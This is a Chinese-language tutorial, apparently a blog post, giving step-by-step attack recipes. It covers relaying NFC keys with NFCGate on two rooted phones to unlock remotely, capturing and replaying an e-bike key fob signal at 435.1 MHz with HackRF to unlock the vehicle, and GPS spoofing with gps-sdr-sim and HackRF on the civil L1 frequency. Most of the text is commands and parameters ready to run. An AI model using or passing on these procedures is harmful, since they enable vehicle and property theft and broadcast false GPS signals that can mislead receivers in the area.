利用NFCGate中继远程开锁
准备工作
需要设备,两台root的手机(安卓)
项目地址:
1
2
3
| https://github.com/nfcgate/server
https://github.com/nfcgate/nfcgate
https://github.com/nfcgate/nfcgate/releases
|
启动服务端
1
2
3
| git clone https://github.com/nfcgate/server
cd server
python server.py
|
安装app
下载地址:https://github.com/nfcgate/nfcgate/releases
配置连接服务端,Hostname为启动server.py的IP,Port默认为5566:
模式选择
选择中继模式,接触卡片的手机选择Reader,接触车辆的手机选择Tag:
可能碰到的问题
移步lsp,启用模块,勾选系统框架,重启:
对钥匙进行重放,远程开启车钥匙
安装hackrf
1
2
3
4
| # Linux安装
sudo apt-get install hackrf
# Mac安装
brew install hackrf
|
使用方法:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| hackrf_info
hackrf_transfer
hackrf_transfer -h
hackrf_transfer -r capture.raw -f 315000000 -l 8/16/24 -g 20/40 [-s 2000000 -n 10000000 -a 1]
hackrf_transfer -t capture.raw -f 315000000 -x 40 [-s 2000000 -a 1]
|
一、确定信号频率。
打开Gqrx(https://github.com/gqrx-sdr/gqrx),调到430左右(一般遥控频率),打开设备,观察波形,找到频率变化最大的峰值,确定具体频率,经测试我电车的遥控器频率为435100kHZ。
建议直接下载打包好的:https://github.com/gqrx-sdr/gqrx/releases/tag/v2.16
二、录制信号
使用指令进行信号录制并存入文件,-r为写入文件,dian.raw即为录制的文件名;-f为采样频率;-g 为RX VGA(baseband) gain;-i为TX LAN(F) gain。-g -l用来进行信号放大。运行后对准天线按下遥控器,可以多按几下,然后crl+c停止录制。
1
| hackrf_transfer -r dian.raw -f 435100000 -g 16 -l 32
|
三、重放信号
录制完毕并存入文件后,使用下述指令进行重放,重放的文件就是刚刚录制的。-t用来制定文件;-×为TX VGA (IF) gain 放大信号。重放时天线对准电车,即可实现车辆解锁。
1
| hackrf_transfer -t dian.raw -f 435100000 -x 47
|
GPS欺骗
使用hackrf one进行GPS欺骗
下载GPS星历
1
| http://www.igs.gnsswhu.cn/index.php/home/data_product/igs.html
|
进行二进制转换
工具地址:https://github.com/osqzss/gps-sdr-sim
1
| ./gps-sdr-sim -e /root/桌面/gps/brdc3100.21n -l 29.6562801500,91.1257504400 -b 8 -o /root/桌面/gps/xx.bin
|
发送欺骗信号
1
2
3
4
5
6
7
8
| hackrf_transfer -t xx.bin -f 1575420000 -s 2600000 -a 1 -x 20 -R
-t 文件名,从文件传输数据(刚刚生成的二进制文件)
-f 频率赫兹 1575420000民用频段(一般不需要改)
-s采样速率2.6Msps(一般不需要改)
-a 放大器使能,接收/发射射频放大器 1 =使能,0 =禁用
-R 重复发射模式
-x 增益分贝,TX VGA(中频)增益,0-47分贝,1dB步长
|